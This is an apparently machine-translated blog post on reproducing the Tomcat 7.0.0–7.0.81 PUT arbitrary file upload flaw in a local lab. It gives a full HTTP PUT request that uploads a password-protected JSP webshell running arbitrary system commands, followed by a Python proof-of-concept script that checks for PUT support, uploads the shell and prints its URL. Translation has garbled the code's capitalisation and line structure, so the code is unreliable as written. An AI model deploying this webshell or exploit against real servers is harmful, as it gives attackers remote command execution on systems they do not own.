Today broke a tomcat7 arbitrary file upload loophole, after watching the analysis of Daniel, my own local build environment retest.
The tomcat version of the vulnerability impact is tomcat7.0.0-7.0.81 version
I downloaded the tomcat7.0.56 version test locally.
Test process:
1. Download tomcat7.0.0-7.0.81 version, after decompression modify Conf/web.xml file add readonly parameter, property value is False
As shown in figure:
Then start Tomcat
2. Upload Webshell
Using Burpsuite to send the constructed Webshell
The contents are as follows:
put/123.jsp/http/1.1
host:192.168.23.209:8080
user-agent: jntass
dnt:1
connection:close
content-length:664
<%@ page language= "java" import= "java.util.*,java.io.*" pageencoding= "UTF-8"%> <%!public static string Excutecmd (String c) {StringBuilder line = new StringBuilder (); try {Process pro = Runtime.getrun Time (). exec (c); BufferedReader buf = new BufferedReader (New InputStreamReader (Pro.getinputstream ())); String temp = null;while ((temp = Buf.readline ())!= null) {line.append (temp
+ "\\n");} Buf.close ();} catch (Exception e) {line.append (E.getmessage ());} return line.tostring ();} %><%if ("023". Equals (Request.getparameter ("pwd")) &&! "". Equals (Request.getparameter ("cmd")) {out.println ("<pre>" +excutecmd (Request.getparameter ("cmd")) + "</ Pre> ");} Else{out.println (":-)");} %>
This is Daniel's Python POC script.
#! -*-coding:utf-8-*-import httplib import sys import time BODY = ' <%@ page language= ' java ' import= ' Java.util.*,java . io.* "pageencoding=" UTF-8%><%!public static string Excutecmd (String c) {StringBuilder line = new StringBuilder () ; try {Process pro = Runtime.getruntime (). exec (c); BufferedReader buf = new BufferedReader (New InputStreamReader (Pro.getinputstream ())); String temp = null;while ((temp = Buf.readline ())!= null) {line.append (temp + "\\n");} Buf.close ();} catch (Exception e) {line.append (E.getmessage ());} return line.tostring ();} %><%if ("023". Equals (Request.getparameter ("pwd")) &&! "". Equals (Request.getparameter ("cmd")) {out.println ("<pre>" +excutecmd (Request.getparameter ("cmd")) + "</ Pre> ");} Else{out.println (":-)");} %> ' Try:conn = httplib. Httpconnection (Sys.argv[1]) conn.request (method= ' OPTIONS ', url= '/ffffzz ') headers = Dict (Conn.getresponse (). Gethea DERs ()) If ' Allow ' in headers and/headers[' Allow '].find (' put ') > 0:conn.close () conn = Httplib. Httpconnection (sys.argv[1]) URL = "/" + str (int (time.time ())) + '. jsp/' #url = '/' + str (int (time.time ()) +] + ' . JSP:: $DATA ' conn.request (method= ' put ', url= URL, body=body) res = Conn.getresponse () if Res.stat US = = 201: #print ' Shell: ', ' http://' + sys.argv[1] + url[:-7] print ' shell: ', ' http://' + sys.a
RGV[1] + url[:-1] elif res.status = = 204:print ' file exists ' else:print ' ERROR ' Conn.close () Else:print ' Server not vulnerable ' except Exception,e:print ' Error: ', E